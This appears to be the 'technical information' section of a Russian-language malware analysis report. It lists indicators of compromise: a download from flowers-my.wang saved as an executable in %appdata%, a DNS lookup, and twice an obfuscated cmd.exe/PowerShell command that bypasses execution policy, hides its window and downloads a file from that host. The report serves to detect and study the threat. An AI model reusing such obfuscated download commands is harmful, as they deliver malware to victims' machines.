Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^wE^rsHEl^L.^exe -eXe^c^Ut^iOn^p^OLIcy^ ByPA^SS ^-nOpRo^fI^l^E -^winDOW^S^T^YlE h^I^dd^En^ (NEW-^O^bj^e^C^t Sy^ST^Em.N^eT^.wE^BClIeNT)^.dO^wNlOADFiLe(^'http://flowers-my....
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /C "P^O^wE^rsHEl^L.^exe -eXe^c^Ut^iOn^p^OLIcy^ ByPA^SS ^-nOpRo^fI^l^E -^winDOW^S^T^YlE h^I^dd^En^ (NEW-^O^bj^e^C^t Sy^ST^Em.N^eT^.wE^BClIeNT)^.dO^wNlOADFiLe(^'http://flowers-my....' (со скрытым окном)